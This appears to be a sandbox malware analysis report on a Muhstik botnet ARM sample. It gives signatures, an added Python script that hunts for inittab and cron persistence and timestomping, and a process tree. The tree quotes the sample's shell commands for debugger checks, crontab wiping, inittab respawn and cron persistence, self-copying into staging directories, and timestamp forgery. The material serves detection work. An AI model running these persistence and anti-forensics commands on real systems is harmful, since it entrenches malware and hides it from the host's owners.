Resubmissions

14-03-2022 13:27

220314-qp8dmafgh6 10

14-03-2022 05:56

220314-gm2nmaffbr 10

Analysis

  • max time kernel
    8255s
  • max time network
    190s
  • platform
    linux_armhf
  • resource
    debian9-armhf-en-20211208
  • submitted
    14-03-2022 05:56

General

  • Target

    0abc01de8962867957bca89f6bd4c10e

  • Size

    1.6MB

  • MD5

    0abc01de8962867957bca89f6bd4c10e

  • SHA1

    a7b49698f0562b887d1c5b96272b50e9e13cba80

  • SHA256

    46389c117c5f41b60e10f965b3674b3b77189b504b0aeb5c2da67adf55a7129f

  • SHA512

    508fec5f009bfe080ce31b510c21cbe22caa83a4b82c44786f08c53ac04e290d10c0efe4f71ac88b33946e6c7fec2665fbc221adf08af5e428f8c1df17777318

Score
10/10

Malware Config

Signatures

  • suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

    suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

  • Writes file to system bin folder 1 TTPs 3 IoCs
  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Write file to user bin folder 1 TTPs 2 IoCs
  • Reads runtime system information 20 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.
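The process tree below is the sample's whole persistence routine, repeated once per staging directory: copy itself from /tmp to /dev/shm, /var/tmp, /var/lock and /var/run, rewrite /etc/inittab through a temporary /etc/inittab2 so that it ends with a `0:2345:respawn:<path>` line, add a `* * * * * <path> > /dev/null 2>&1 &` crontab job for the same path, and finally `touch -acmr /bin/ls /etc/inittab` to copy the access and modification times of /bin/ls onto the edited file. The script below is an added hunting example for this report; it is not code from the sandbox vendor or from the sample. It parses inittab and crontab text for entries that point into those staging directories and flags the timestamp copy. `SAMPLE_INITTAB` and `SAMPLE_CRONTAB` are constructed inputs that mirror the lines the sample writes, and `FileTimes`, `hunt_live` and `SUSPECT_DIRS` are helpers defined here, not part of any library.

```python
"""Hunt for the inittab/cron persistence seen in the process tree (added example)."""
import os
import re
from dataclasses import dataclass
from typing import List, Tuple

# Staging directories the sample copies itself into. All are world-writable or
# tmpfs, and none is a legitimate home for an init-respawned daemon.
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/var/lock/", "/var/run/")

# sysvinit / busybox inittab record: id:runlevels:action:process
INITTAB_RE = re.compile(r"^([^:#\s]+):([^:]*):([^:]+):(.*)$")

# Constructed sample inputs; the last line of each is what the sample writes.
SAMPLE_INITTAB = """\
# /etc/inittab: init(8) configuration (constructed sample)
id:2:initdefault:
si::sysinit:/etc/init.d/rcS
1:2345:respawn:/sbin/getty 38400 tty1
0:2345:respawn:/tmp/0abc01de8962867957bca89f6bd4c10e
"""

SAMPLE_CRONTAB = """\
# m h dom mon dow command (constructed sample)
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &
"""


def _first_word(command: str) -> str:
    parts = command.split()
    return parts[0] if parts else ""


def in_suspect_dir(path: str) -> bool:
    """True when the executable path starts with one of the staging directories."""
    return path.startswith(SUSPECT_DIRS)


def scan_inittab(text: str) -> List[Tuple[str, str]]:
    """Return (id, process) for respawn entries whose binary lives in a suspect dir.

    `respawn` makes init restart the process every time it exits, which is why
    the sample uses it rather than `once` or `wait`.
    """
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = INITTAB_RE.match(line)
        if not m:
            continue
        ident, _runlevels, action, process = m.groups()
        if action == "respawn" and in_suspect_dir(_first_word(process)):
            hits.append((ident, process))
    return hits


def scan_crontab(text: str) -> List[str]:
    """Return crontab lines whose command runs a binary from a suspect dir.

    Handles the five-field schedule the sample writes and the `@reboot`-style
    shorthand; variable assignments (SHELL=...) have no command and are skipped.
    """
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            parts = [" ".join(fields[:5]), fields[5]] if len(fields) == 6 else []
        if len(parts) != 2:
            continue
        if in_suspect_dir(_first_word(parts[1])):
            hits.append(line)
    return hits


@dataclass(frozen=True)
class FileTimes:
    """Timestamps in ns; helper type for this example, filled from os.stat()."""
    atime_ns: int
    mtime_ns: int
    ctime_ns: int


def file_times(path: str) -> FileTimes:
    st = os.stat(path)
    return FileTimes(st.st_atime_ns, st.st_mtime_ns, st.st_ctime_ns)


def looks_timestomped(target: FileTimes, reference: FileTimes) -> bool:
    """Detect `touch -acmr <reference> <target>`.

    touch -r copies atime and mtime from the reference exactly, but ctime is not
    settable by touch and is bumped to "now", so a stomped file has ctime newer
    than its mtime. Both conditions together are the tell.
    """
    return (
        target.atime_ns == reference.atime_ns
        and target.mtime_ns == reference.mtime_ns
        and target.ctime_ns > target.mtime_ns
    )


def hunt_live(inittab: str = "/etc/inittab", reference: str = "/bin/ls") -> dict:
    """Run the inittab and timestamp checks on this host; missing files are reported, not fatal."""
    report: dict = {"inittab": [], "timestomped": None}
    try:
        with open(inittab) as fh:
            report["inittab"] = scan_inittab(fh.read())
        report["timestomped"] = looks_timestomped(file_times(inittab), file_times(reference))
    except OSError as exc:
        report["error"] = str(exc)
    return report


if __name__ == "__main__":
    print("inittab hits:", scan_inittab(SAMPLE_INITTAB))
    print("crontab hits:", scan_crontab(SAMPLE_CRONTAB))
    print("live host   :", hunt_live())
```

Two caveats when using this on a real host. The Debian 9 sandbox image boots systemd, which does not read /etc/inittab, so the respawn entry is inert in the analysis above; it only bites on busybox or sysvinit systems, which is where many embedded ARM devices live, and there a user crontab may not exist at all (the `grep -v "no cron"` in the tree tolerates `crontab -l` reporting "no crontab for root"). Second, on firmware images where every file carries the same build-time mtime, an atime/mtime match with /bin/ls alone is not evidence; the ctime condition in `looks_timestomped` is what separates `touch -r` from an image-wide timestamp.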

Processes

  • ./0abc01de8962867957bca89f6bd4c10e
    ./0abc01de8962867957bca89f6bd4c10e
    1⤵
    • Modifies rc script
    • Writes file to tmp directory
    PID:358
    • /bin/sh
      sh -c "pidof -x strace > /dev/null"
      2⤵
      PID:359
      • /bin/pidof
        pidof -x strace
        3⤵
        PID:360
    • /bin/sh
      sh -c "pidof -x tcpdump > /dev/null"
      2⤵
      PID:361
      • /bin/pidof
        pidof -x tcpdump
        3⤵
        PID:366
    • /bin/sh
      sh -c "cat /etc/inittab | grep -v \"/tmp/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
      2⤵
      PID:371
      • /bin/cat
        cat /etc/inittab
        3⤵
        PID:374
      • /bin/grep
        grep -v /tmp/0abc01de8962867957bca89f6bd4c10e
        3⤵
        PID:376
    • /bin/sh
      sh -c "echo \"0:2345:respawn:/tmp/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
      2⤵
      PID:378
    • /bin/sh
      sh -c "cat /etc/inittab2 > /etc/inittab"
      2⤵
      PID:382
      • /bin/cat
        cat /etc/inittab2
        3⤵
        PID:383
    • /bin/sh
      sh -c "rm -rf /etc/inittab2"
      2⤵
      PID:384
      • /bin/rm
        rm -rf /etc/inittab2
        3⤵
        PID:385
    • /bin/sh
      sh -c "touch -acmr /bin/ls /etc/inittab"
      2⤵
      PID:386
      • /usr/bin/touch
        touch -acmr /bin/ls /etc/inittab
        3⤵
        PID:387
  • /bin/sh
    sh -c "crontab -r"
    1⤵
    PID:369
    • /usr/bin/crontab
      crontab -r
      2⤵
      • Reads runtime system information
      PID:372
  • /bin/sh
    sh -c "crontab -l | grep /tmp/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:370
    • /usr/bin/crontab
      crontab -l
      2⤵
      • Reads runtime system information
      PID:373
    • /bin/grep
      grep /tmp/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:375
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:377
    • /usr/bin/crontab
      crontab -
      2⤵
      • Reads runtime system information
      PID:380
  • /usr/bin/crontab
    crontab -l
    1⤵
    • Reads runtime system information
    PID:381
  • /bin/sh
    sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /dev/shm/0abc01de8962867957bca89f6bd4c10e"
    1⤵
    PID:390
    • /bin/cp
      cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /dev/shm/0abc01de8962867957bca89f6bd4c10e
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:392
  • /bin/sh
    sh -c "/bin/uname -n"
    1⤵
    PID:391
    • /bin/uname
      /bin/uname -n
      2⤵
      PID:393
  • /bin/sh
    sh -c "crontab -l | grep /dev/shm/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:396
    • /usr/bin/crontab
      crontab -l
      2⤵
      • Reads runtime system information
      PID:398
    • /bin/grep
      grep /dev/shm/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:400
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:401
    • /usr/bin/crontab
      crontab -
      2⤵
      • Reads runtime system information
      PID:405
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/dev/shm/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
    1⤵
    PID:395
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:397
    • /bin/grep
      grep -v /dev/shm/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:399
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/dev/shm/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
    1⤵
    PID:402
  • /usr/bin/crontab
    crontab -l
    1⤵
    • Reads runtime system information
    PID:404
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:406
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:408
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:410
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:411
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:412
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:413
  • /bin/sh
    sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/tmp/0abc01de8962867957bca89f6bd4c10e"
    1⤵
    PID:414
    • /bin/cp
      cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/tmp/0abc01de8962867957bca89f6bd4c10e
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:415
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/var/tmp/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
    1⤵
    PID:417
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:419
    • /bin/grep
      grep -v /var/tmp/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:420
  • /bin/sh
    sh -c "crontab -l | grep /var/tmp/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:418
    • /usr/bin/crontab
      crontab -l
      2⤵
      • Reads runtime system information
      PID:421
    • /bin/grep
      grep /var/tmp/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:422
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:423
    • /usr/bin/crontab
      crontab -
      2⤵
      • Reads runtime system information
      PID:427
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/var/tmp/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
    1⤵
    PID:424
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:425
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:429
  • /usr/bin/crontab
    crontab -l
    1⤵
    • Reads runtime system information
    PID:428
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:430
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:431
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:432
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:433
  • /bin/sh
    sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/lock/0abc01de8962867957bca89f6bd4c10e"
    1⤵
    PID:434
    • /bin/cp
      cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/lock/0abc01de8962867957bca89f6bd4c10e
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:435
  • /bin/sh
    sh -c "crontab -l | grep /var/lock/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:438
    • /usr/bin/crontab
      crontab -l
      2⤵
      • Reads runtime system information
      PID:440
    • /bin/grep
      grep /var/lock/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:442
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:443
    • /usr/bin/crontab
      crontab -
      2⤵
      • Reads runtime system information
      PID:446
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/var/lock/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
    1⤵
    PID:437
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:439
    • /bin/grep
      grep -v /var/lock/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:441
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/var/lock/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
    1⤵
    PID:444
  • /usr/bin/crontab
    crontab -l
    1⤵
    • Reads runtime system information
    PID:447
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:448
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:449
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:450
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:451
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:452
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:453
  • /bin/sh
    sh -c "cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/run/0abc01de8962867957bca89f6bd4c10e"
    1⤵
    PID:454
    • /bin/cp
      cp -f /tmp/0abc01de8962867957bca89f6bd4c10e /var/run/0abc01de8962867957bca89f6bd4c10e
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:455
  • /bin/sh
    sh -c "crontab -l | grep /var/run/0abc01de8962867957bca89f6bd4c10e | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/0abc01de8962867957bca89f6bd4c10e > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:457
    • /usr/bin/crontab
      crontab -l
      2⤵
      • Reads runtime system information
      PID:460
    • /bin/grep
      grep /var/run/0abc01de8962867957bca89f6bd4c10e
      2⤵
      PID:462
    • /bin/grep
      grep -v "no cron"
      2⤵
                                                                                                                                          PID:463
                                                                                                                                        • /usr/bin/crontab
                                                                                                                                          crontab -
                                                                                                                                          2⤵
                                                                                                                                          • Reads runtime system information
                                                                                                                                          PID:466
                                                                                                                                      • /bin/sh
                                                                                                                                        sh -c "cat /etc/inittab | grep -v \"/var/run/0abc01de8962867957bca89f6bd4c10e\" > /etc/inittab2"
                                                                                                                                        1⤵
                                                                                                                                          PID:458
                                                                                                                                          • /bin/cat
                                                                                                                                            cat /etc/inittab
                                                                                                                                            2⤵
                                                                                                                                              PID:459
                                                                                                                                            • /bin/grep
                                                                                                                                              grep -v /var/run/0abc01de8962867957bca89f6bd4c10e
                                                                                                                                              2⤵
                                                                                                                                                PID:461
                                                                                                                                            • /bin/sh
                                                                                                                                              sh -c "echo \"0:2345:respawn:/var/run/0abc01de8962867957bca89f6bd4c10e\" >> /etc/inittab2"
                                                                                                                                              1⤵
                                                                                                                                                PID:465
                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                crontab -l
                                                                                                                                                1⤵
                                                                                                                                                • Reads runtime system information
                                                                                                                                                PID:467
                                                                                                                                              • /bin/sh
                                                                                                                                                sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                1⤵
                                                                                                                                                  PID:468
                                                                                                                                                  • /bin/cat
                                                                                                                                                    cat /etc/inittab2
                                                                                                                                                    2⤵
                                                                                                                                                      PID:469
                                                                                                                                                  • /bin/sh
                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:470
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                        2⤵
                                                                                                                                                          PID:471
                                                                                                                                                      • /bin/sh
                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:472
                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                            2⤵
                                                                                                                                                              PID:473
